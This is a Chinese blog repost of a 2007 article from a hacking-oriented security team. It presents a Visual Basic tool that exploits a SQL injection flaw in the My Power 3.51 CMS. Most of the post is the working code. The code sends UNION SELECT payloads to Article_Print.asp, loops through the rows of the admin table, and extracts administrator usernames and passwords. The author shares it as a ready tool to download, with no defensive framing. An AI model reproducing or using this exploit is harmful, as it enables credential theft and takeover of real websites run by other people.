很久前发的小程序,这次博客重新见天又给发上来了,作为自己学习的一个好的东东!~最近学c++把VB忘得差不多了,看来又要恶补了~。其实我挺喜欢VB编程的,所以就自学了。别人认为简单不用学,我不这样认为,简单你能学好?我很讨厌这样自以为是的家伙~~这里强烈BS,喜欢的话就看看代码。。。
下面是文章原文:
文章作者:阿〓☆〓狼
文章来源:邪恶八进制信息安全团队(www.eviloctal.com)
呵呵,听朋友说my power 3.51 出了最新的注入漏洞,说可以批量拿shell,但是我没有拿到利用程序,也没有拿到漏洞文章。就硬着头皮看了下代码。真让我找着了,就顺便写了工具,用vb写的~~
下面是主要代码:
Copy code
Option Explicit
Dim FURL As String
Dim fileno, stemp, pagecode, httpheader, B, C, A, lenp, d, i, e
Private Sub Command1_Click()
If Text1.Text = "" Then
MsgBox "请输入网址"
GoTo AAA
Else
FURL = Trim$(Text1.Text)
End If
Text2.Text = ""
For i = 1 To 100
Inet1.Execute FURL & "Article_Print.asp", "Post", _
"ArticleID=1000%20union%20(select%20top%201%201,1,'fuser:'%2busername%2bchr(124),'fpass:'%2bpassword%2bchr(124),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20(select%20top%20" & i _
& "%20username,password%20from%20admin%20order%20by%20username)%20order%20by%20username%20desc)", _
"Content-Type: application/x-www-form-urlencoded "
Do Until Inet1.StillExecuting = False '阻塞前面的Inet1
DoEvents
Loop
pagecode = ""
stemp = Inet1.GetChunk(1024)
Do While stemp <> ""
pagecode = pagecode + stemp
stemp = Inet1.GetChunk(1024)
Loop
httpheader = InStr(1, pagecode, _
"fuser", 1)
lenp = InStr(1, pagecode, _
"fpass", 1)
C = ""
B = ""
If httpheader <> 0 Then
For A = httpheader + 6 To httpheader + 25
If Asc(Mid(pagecode, A, 1)) <> 124 Then
B = B & Mid(pagecode, A, 1)
Else
Exit For
End If
Next
End If
If lenp <> 0 Then
For A = lenp + 6 To lenp + 25
If Asc(Mid(pagecode, A, 1)) <> 124 Then
C = C & Mid(pagecode, A, 1)
Else
Exit For
End If
Next
End If
If B = d Then
Exit For
End If
d = B
Text2.Text = Text2.Text & "用户:" & B & " " & "密码:" & C & vbCrLf
Next
AAA:
End Sub
Private Sub Command3_Click()
End
End Sub
这个代码我就不多解释了,呵呵,发来这里给大家分享下,有错误的地方还忘指出。
呵呵,这个软件早写好了,听说网络上已经有比我早的利用工具了,就给发出来了。
点击这里下载文件 |
发表于 2007-10-15 16:44:30